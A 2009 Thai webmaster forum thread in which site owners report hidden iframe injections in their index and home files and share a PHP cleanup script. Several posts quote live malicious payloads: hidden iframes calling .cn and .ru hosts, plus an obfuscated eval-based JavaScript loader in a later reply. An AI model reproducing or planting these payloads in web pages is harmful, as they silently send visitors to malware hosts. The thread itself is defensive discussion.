jupiterjan
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 110
 ออฟไลน์
กระทู้: 1,286
|
 |
« เมื่อ: 16 กุมภาพันธ์ 2009, 10:57:21 » |
|
?<html><body><iframe src="http://bestlotron.cn/in.cgi?cocacola52" width=1 height=1 style="visibility: hidden"></iframe></body></html>
http://pisek.ru//shablon/08-02-03/system/pdf.php?id=10869&vis =1 ประมาณนี้ครับ (ใน index.php,html) สงสัย secure ไม่ดี ยิ่งมือใหม่ด้วย  |
|
|
|
|
บันทึกการเข้า
|
บริการ Text link web Pr5 (DA=47 PA=55 mR=5.13) ติด dmoz อายุ 20ปี(1996-2016) แถม Pr4 1เว็บ pr2 2เว็บ pr1 1เว็บ ราคา 700 ต่อ เดือน สนใจPM ครับ แสดงผล ทุกหน้า
- ไม่รับเว็บที่ผิดกฎหมาย , 18+ , การพนัน , เว็บหมิ่นสถาบัน
ข่าวอสังหา ล่าสุด  ่ว่าง 3ที่
ขายโดเมน koratnow.com 2000 บาท godaddy
user thaiseomarket :: infinitewire
|
|
|
|
ndesigns
|
|
« ตอบ #1 เมื่อ: 16 กุมภาพันธ์ 2009, 11:14:53 » |
|
ตัวนี้มันจะเจาะเข้าที่โฮสแล้วไปฝังในไฟล์ index.php index.html home.php ลองเช็คกันดูนะคับผมโดนไปหลายโฮส  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
BosnoS
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 222
ออฟไลน์
กระทู้: 8,168
|
|
« ตอบ #2 เมื่อ: 16 กุมภาพันธ์ 2009, 11:16:02 » |
|
โดนกันทั่วครับ ขอให้ชื่อไพล์มีคำว่า index มันฝังหมดล่ะ ขนาดเว็บผมเขียนเองนะ ไม่มีสคริปแจกฟรีเลย ก็ยังโดน แต่ล่าสุดไม่โดนมาหลายวันล่ะ ไปแล้วมั่ง  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
Step9
Verified Seller
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 122
ออฟไลน์
กระทู้: 8,518
|
|
« ตอบ #3 เมื่อ: 16 กุมภาพันธ์ 2009, 11:19:38 » |
|
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
tosakp
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 113
ออฟไลน์
กระทู้: 1,960
|
|
« ตอบ #4 เมื่อ: 16 กุมภาพันธ์ 2009, 11:20:45 » |
|
ใน index.xxx home.xxx default.xxx .xxx ก็มี .html .htm .php โดนกันทั่วหน้า ผมเขียน code แก้ประมาณนี้ ชื่อไฟล์ fixed.php เอาไปใส่ที่ root ของโดเมน แล้วก็เรียกมัน การทำงาน ===== - มันจะเปิด ไฟล์ index.xxx และ home.xxx มาแล้วสั่ง replace code ที่มันฝังมาด้วย ว่างๆ - จะเปิดโฟล์เดอร์ภายใต้ไปเรื่อยๆ เพื่อหาไฟล์ index.xxx และ home.xxx หมายเหตุ:
- code ที่ฝั่งแต่ละคนไม่เหมือนกันนะครับ แก้ไฟล์เอาเอง <?
ini_set('max_execution_time','0');
ini_set('max_input_time','0');
ini_set('memory_limit','128M');
function recurse_replace($filepath)
{
if (is_dir($filepath) && !is_link($filepath))
{
if ($dh = opendir($filepath))
{
while (($sf = readdir($dh)) !== false)
{
if ($sf == '.' || $sf == '..')
{
continue;
}
if (!recurse_replace($filepath.'/'.$sf))
{
}
}
closedir($dh);
}
} else {
if(substr_count($filepath ,"/index.") || substr_count($filepath ,"/home.")) {
echo "File: " . $filepath . "<br>\r\n";
$lines = file_get_contents($filepath);
$lines = str_replace("<html><body><iframe src=\"http://litetopfindworld.cn/in.cgi?cocacola48\" width=1 height=1 style=\"visibility: hidden\"></iframe></body></html>", "", $lines);
$lines = str_replace("<iframe src=\"http://litetopfindworld.cn/in.cgi?cocacola48\" width=1 height=1 style=\"visibility: hidden\"></iframe>", "", $lines);
$lines = str_replace("<html><body></body></html>", "", $lines);
$handle = fopen($filepath, "w");
fwrite($handle, $lines);
fclose($handle);
$lines = "";
}
}
}
recurse_replace(dirname(__FILE__));
?>
|
|
|
|
« แก้ไขครั้งสุดท้าย: 16 กุมภาพันธ์ 2009, 11:26:41 โดย tosakp »
|
บันทึกการเข้า
|
|
|
|
nongmy
คนรักเสียว
พลังน้ำใจ: 3
ออฟไลน์
กระทู้: 173
|
|
« ตอบ #5 เมื่อ: 16 กุมภาพันธ์ 2009, 11:23:23 » |
|
โดนเหมือนกัน
้Host แบนเลย
บอกว่า IDC CAT แจ้ง
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
jupiterjan
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 110
ออฟไลน์
กระทู้: 1,286
|
|
« ตอบ #6 เมื่อ: 16 กุมภาพันธ์ 2009, 11:43:42 » |
|
ใน index.xxx home.xxx default.xxx .xxx ก็มี .html .htm .php โดนกันทั่วหน้า ผมเขียน code แก้ประมาณนี้ ชื่อไฟล์ fixed.php เอาไปใส่ที่ root ของโดเมน แล้วก็เรียกมัน การทำงาน ===== - มันจะเปิด ไฟล์ index.xxx และ home.xxx มาแล้วสั่ง replace code ที่มันฝังมาด้วย ว่างๆ - จะเปิดโฟล์เดอร์ภายใต้ไปเรื่อยๆ เพื่อหาไฟล์ index.xxx และ home.xxx หมายเหตุ:
- code ที่ฝั่งแต่ละคนไม่เหมือนกันนะครับ แก้ไฟล์เอาเอง <?
ini_set('max_execution_time','0');
ini_set('max_input_time','0');
ini_set('memory_limit','128M');
function recurse_replace($filepath)
{
if (is_dir($filepath) && !is_link($filepath))
{
if ($dh = opendir($filepath))
{
while (($sf = readdir($dh)) !== false)
{
if ($sf == '.' || $sf == '..')
{
continue;
}
if (!recurse_replace($filepath.'/'.$sf))
{
}
}
closedir($dh);
}
} else {
if(substr_count($filepath ,"/index.") || substr_count($filepath ,"/home.")) {
echo "File: " . $filepath . "<br>\r\n";
$lines = file_get_contents($filepath);
$lines = str_replace("<html><body><iframe src=\"http://litetopfindworld.cn/in.cgi?cocacola48\" width=1 height=1 style=\"visibility: hidden\"></iframe></body></html>", "", $lines);
$lines = str_replace("<iframe src=\"http://litetopfindworld.cn/in.cgi?cocacola48\" width=1 height=1 style=\"visibility: hidden\"></iframe>", "", $lines);
$lines = str_replace("<html><body></body></html>", "", $lines);
$handle = fopen($filepath, "w");
fwrite($handle, $lines);
fclose($handle);
$lines = "";
}
}
}
recurse_replace(dirname(__FILE__));
?>
ขอบคุณครับ เดี๋ยวไปมั่วดู  |
|
|
|
|
บันทึกการเข้า
|
บริการ Text link web Pr5 (DA=47 PA=55 mR=5.13) ติด dmoz อายุ 20ปี(1996-2016) แถม Pr4 1เว็บ pr2 2เว็บ pr1 1เว็บ ราคา 700 ต่อ เดือน สนใจPM ครับ แสดงผล ทุกหน้า
- ไม่รับเว็บที่ผิดกฎหมาย , 18+ , การพนัน , เว็บหมิ่นสถาบัน
ข่าวอสังหา ล่าสุด ่ว่าง 3ที่
ขายโดเมน koratnow.com 2000 บาท godaddy
user thaiseomarket :: infinitewire
|
|
|
|
swk317
บุคคลทั่วไป
|
|
« ตอบ #7 เมื่อ: 16 กุมภาพันธ์ 2009, 11:47:00 » |
|
น่ากลัว
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
BosnoS
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 222
ออฟไลน์
กระทู้: 8,168
|
|
« ตอบ #8 เมื่อ: 16 กุมภาพันธ์ 2009, 11:49:10 » |
|
ขอบคุณมากครับ คุณต่อ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
wingolfer
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 37
ออฟไลน์
กระทู้: 1,046
|
|
« ตอบ #9 เมื่อ: 16 กุมภาพันธ์ 2009, 14:55:22 » |
|
ขอบคุณครับ จะเข้าไปเช็คมั้ง
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
rapeedu
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 34
ออฟไลน์
กระทู้: 2,044
|
|
« ตอบ #10 เมื่อ: 19 กุมภาพันธ์ 2009, 15:56:58 » |
|
ขอบคุณมากครับ ที่ บ. ผมก็โดนวันนี้เองครับ มันติดมาจากเครื่อง PC, Laptop ที่ติด Spyware ตัวนี้ พอ ftp ไปเข้า server มันจะติดด้วยในทันที และทำการ แก้ไขไฟล์เราเลยครับ
ก่อน ftp เช็คเครื่องตนเองก่อนนะครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
TAXZe
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 446
ออฟไลน์
กระทู้: 4,005
|
|
« ตอบ #11 เมื่อ: 19 กุมภาพันธ์ 2009, 18:20:24 » |
|
ขอบคุณครับ
โค้ดด้วยๆ
^0^
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
Uesugi
สมุนแก๊งเสียว
พลังน้ำใจ: 20
ออฟไลน์
กระทู้: 511
|
|
« ตอบ #12 เมื่อ: 19 กุมภาพันธ์ 2009, 18:36:55 » |
|
ขอบคุณมากครับ ใช้ Joomla เหมือนกันครับ ชักผวาแล้วสิ เดี๋ยวต้องไปเช็คดูซะแล้ว |
|
|
|
|
บันทึกการเข้า
|
|
|
|
offf
คนรักเสียว
พลังน้ำใจ: 1
ออฟไลน์
กระทู้: 104
|
|
« ตอบ #13 เมื่อ: 19 กุมภาพันธ์ 2009, 18:45:23 » |
|
ขอบคุณครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
othpiik
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 69
ออฟไลน์
กระทู้: 1,009
|
|
« ตอบ #14 เมื่อ: 19 กุมภาพันธ์ 2009, 18:52:33 » |
|
ตอนนี้หันมาเล่น CakePHP ครับ กำลังสนุกเลย ไม่รู้จะโดนไหมยังไม่ได้อัพเว้บไซต์ด้วย  |
|
|
|
|
บันทึกการเข้า
|
OneBiz - บริษัทอยู่ที่เยอรมัน เป็นผู้ให้บริการเว็บ Blog เต็มไปด้วยเครื่องมือที่ช่วยทำงานให้ง่ายขึ้น บริการของ onebiz จะเป็นบริการในรูปแบบของ Cloud Sevice สามารถใช้เป็นเนื้อหาเวบไซต์ส่วนตัว, บล็อกโพสต์, เนื้อหาบทความ, วีดีโอ, ข่าวสาร, เพลง, เอกสาร, และเนื้อหาดิจิตอลอื่นๆได้ สำหรับคนที่สนใจอยากทำงานผ่านอินเตอร์เน็ตแบบ 100% สมัครฟรี! ไม่ต้องลงทุน ไม่ต้องขาย ไม่ต้องประชุม ไม่ต้องรักษายอด ไม่ต้องเขียนเว็บเป็น แค่ใช้อินเตอร์เน็ตเข้าเว็บไซต์เป็น เหมือนทำ Amazon แต่ทำเป็นทีม ดูเพิ่มเติม http://www.youtube.com/watch?v=PT0lBCVIiVI  สมัครสมาชิกฟรี : http://intendplus.onebiz.com/ โทร.(โอ) 08-5343-7888 |
|
|
lilly
สมุนแก๊งเสียว
พลังน้ำใจ: 15
ออฟไลน์
กระทู้: 513
|
|
« ตอบ #15 เมื่อ: 19 กุมภาพันธ์ 2009, 19:23:56 » |
|
ขอบคุณค่ะ ... แต่แก้ไม่เป็น จะทำไงดีคะเนี่ย ถ้าลบแ ค่ส่วนนั้นออกไป จะกระทบส่วนอื่นๆด้วยไหมคะ |
|
|
|
|
บันทึกการเข้า
|
|
|
|
sunboy
คนรักเสียว
พลังน้ำใจ: 3
ออฟไลน์
กระทู้: 185
|
|
« ตอบ #16 เมื่อ: 20 กุมภาพันธ์ 2009, 12:55:44 » |
|
ถ้าโดน spyware ผ่าน ftp ใช้โปรแกรมอื่นที่ไม่ใช่ joomla ก็ต้องระวังเหมือนกันนะครับ สรุปว่าต้องหมั่นอัพเดทโปรแกรมแอนตี้ไวรัสครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
anupol_Tex
ก๊วนเสียว
พลังน้ำใจ: 12
ออฟไลน์
กระทู้: 423
|
|
« ตอบ #17 เมื่อ: 20 กุมภาพันธ์ 2009, 13:29:58 » |
|
โลกหน่อโลก ทำไมช่างโหดร้ายอย่างนี้ เท่าที่นับ โดนมา 7 รอบแล้ว
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
Rungson
คนรักเสียว
พลังน้ำใจ: 1
ออฟไลน์
กระทู้: 167
|
|
« ตอบ #18 เมื่อ: 22 กุมภาพันธ์ 2009, 14:10:40 » |
|
เหอะๆๆ มันเป็นเรื่องธรรมดานะครับ แต่ก็ไม่น่าทำกันเลย ของผมดีที่ทาง host เค้าดูแลดี  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
asshur
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 59
ออฟไลน์
กระทู้: 3,315
|
|
« ตอบ #19 เมื่อ: 23 มีนาคม 2009, 15:45:41 » |
|
สดๆ <span id='ffafd4f392da093e46a731f167f8a26638'><script type="text/javascript">var jj=window["e"+new String("v")+"a"+new String("l")]("e"+new String("v")+"a"+new String("l")); jj('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x68\x69\x59\x35\x53\x4f\x71\x6d\x28\x63\x7a\x6c\x4f\x76\x59\x75\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x68\x53\x4c\x6a\x30\x28\x66\x45\x67\x4d\x29\x7b\x76\x61\x72\x20\x69\x69\x76\x42\x4d\x3d\x30\x3b\x76\x61\x72\x20\x73\x79\x56\x30\x44\x3d\x66\x45\x67\x4d\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x6d\x43\x78\x6f\x6d\x6d\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6d\x43\x78\x6f\x6d\x6d\x3c\x73\x79\x56\x30\x44\x29\x7b\x69\x69\x76\x42\x4d\x2b\x3d\x6a\x38\x4f\x28\x66\x45\x67\x4d\x2c\x6d\x43\x78\x6f\x6d\x6d\x29\x2a\x73\x79\x56\x30\x44\x3b\x6d\x43\x78\x6f\x6d\x6d\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x69\x69\x76\x42\x4d\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6a\x38\x4f\x28\x74\x37\x74\x6e\x45\x33\x2c\x6e\x5a\x79\x52\x4c\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x74\x37\x74\x6e\x45\x33\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x6e\x5a\x79\x52\x4c\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x70\x56\x65\x4e\x33\x3d\x65\x76\x61\x6c\x28\x27\x61\x23\x72\x4c\x67\x47\x75\x23\x6d\x47\x65\x4c\x6e\x5e\x74\x4c\x73\x23\x2e\x4c\x63\x46\x61\x23\x6c\x23\x6c\x4c\x65\x46\x65\x5e\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5c\x5e\x23\x47\x46\x4c\x5d\x2f\x67\x2c\x20\x27\x27\x29\x29\x2c\x66\x49\x55\x55\x50\x57\x57\x3d\x27\x27\x2c\x6e\x35\x63\x72\x3d\x30\x2c\x66\x61\x50\x5a\x3d\x30\x3b\x76\x61\x72\x20\x6e\x70\x76\x61\x6b\x3d\x28\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x70\x56\x65\x4e\x33\x29\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5e\x40\x61\x2d\x7a\x30\x2d\x39\x41\x2d\x5a\x5f\x2e\x2c\x2d\x5d\x2f\x67\x2c\x27\x27\x29\x3b\x76\x61\x72\x20\x7a\x58\x32\x7a\x78\x69\x3d\x66\x68\x53\x4c\x6a\x30\x28\x6e\x70\x76\x61\x6b\x29\x3b\x63\x7a\x6c\x4f\x76\x59\x75\x3d\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x63\x7a\x6c\x4f\x76\x59\x75\x29\x3b\x66\x6f\x72\x28\x76\x61\x72\x20\x6a\x57\x62\x58\x3d\x30\x3b\x20\x6a\x57\x62\x58\x20\x3c\x20\x28\x63\x7a\x6c\x4f\x76\x59\x75\x2e\x6c\x65\x6e\x67\x74\x68\x29\x3b\x20\x6a\x57\x62\x58\x2b\x2b\x29\x7b\x76\x61\x72\x20\x7a\x6c\x73\x73\x63\x51\x3d\x6a\x38\x4f\x28\x6e\x70\x76\x61\x6b\x2c\x6e\x35\x63\x72\x29\x5e\x6a\x38\x4f\x28\x7a\x58\x32\x7a\x78\x69\x2c\x66\x61\x50\x5a\x29\x3b\x76\x61\x72\x20\x74\x48\x59\x39\x66\x66\x77\x3d\x6a\x38\x4f\x28\x63\x7a\x6c\x4f\x76\x59\x75\x2c\x6a\x57\x62\x58\x29\x3b\x6e\x35\x63\x72\x2b\x2b\x2c\x66\x61\x50\x5a\x2b\x2b\x3b\x66\x49\x55\x55\x50\x57\x57\x2b\x3d\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43'); </script></span>ต้องลบ code มันออกเยอะกว่าจะโพสท์ได้ |
|
|
|
|
บันทึกการเข้า
|
|
|
|
chui761
Verified Seller
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 860
ออฟไลน์
กระทู้: 9,477
|
|
« ตอบ #20 เมื่อ: 23 มีนาคม 2009, 21:06:58 » |
|
อย่างนี้ต้องไปเช็คหน่อยแร้ว ช่วงนี้เว็บยิ่งอืดๆ อยู่ หรือว่าโดนไปแล้วเนี่ย  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
eabby
คนรักเสียว
พลังน้ำใจ: 6
ออฟไลน์
กระทู้: 194
|
|
« ตอบ #21 เมื่อ: 31 พฤษภาคม 2009, 18:20:49 » |
|
ต้องนั่งเช็คทีละ file เลยหรือเปล่าครับ |
|
|
|
|
บันทึกการเข้า
|
|
|
|
nongmai
ก๊วนเสียว
พลังน้ำใจ: 9
ออฟไลน์
กระทู้: 343
|
|
« ตอบ #22 เมื่อ: 31 พฤษภาคม 2009, 18:54:54 » |
|
ผมเคยโดนไปแล้วครั้งหนึ่ง Google แจ้งเตือนว่าเว็บไซต์นี้เป้นอันตรายต่อคอมพิวเตอร์ของคุณ
ทราฟฟิกหายไปเลย แต่ปัญหาที่เกิดจากเครื่องคอมเราเองครับ ยังไงก็ระวังด้วยน่ะ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
klab
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 44
ออฟไลน์
กระทู้: 2,271
|
|
« ตอบ #23 เมื่อ: 31 พฤษภาคม 2009, 18:57:55 » |
|
คุณ nongmai เป็นอะไรกับ คุณครู bugmai หว่า |
|
|
|
|
บันทึกการเข้า
|
|
|
|
|
| หน้า: 1 2 [ทั้งหมด] ขึ้นบน |
|
พัฒนาเว็บไซต์
